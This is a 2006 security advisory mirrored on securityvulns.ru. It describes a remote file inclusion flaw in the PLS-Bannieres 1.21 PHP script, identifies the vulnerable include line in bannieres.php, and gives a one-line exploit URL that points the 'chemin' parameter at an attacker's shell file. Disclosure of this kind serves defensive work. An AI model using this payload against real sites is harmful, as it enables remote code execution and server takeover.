Computer Security

Security Advisory: PLS-Bannieres 1.21 (bannieres.php) File Include
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  CentiPaid <= 1.4.2 [$class_pwd] Remote File Include

  [Full-disclosure] Coppermine 1.4.9 SQL injection

  phpLedAds 2.0(dir) File Include

  Ban v0.1 (bannieres.
php) File Include

From:mahmood ali <mah_k_2000_(at)_hotmail.com>
Date:30.10.2006
Subject:PLS-Bannieres 1.21 (bannieres.php) File Include

###################################################
PLS-Bannieres 1.21 (bannieres.php) File Include
###################################################
Source Code:

ftp://ftp1.comscripts.com/PHP/1959_ban01-01.zip

###################################################
Vulnerable Code:_

modules/bannieres/bannieres.php

###################################################
In Line 13 :_

include "$chemin/includes/connexion.php" ;

###################################################
Exploit :_

http://www.vicTim.com/[Ban_Path]/modules/bannieres/bannieres.php?chemin=Sh3ll.
txt?

###################################################

Discoverd By :  Mahmood_ali

###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team  > WwW.DwRaT.CoM &
WwW.Tryag.CoM

###################################################

_________________________________________________________________
Be the first to hear what's new at MSN - sign up to our free newsletters!
http://www.msn.co.uk/newsletters

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru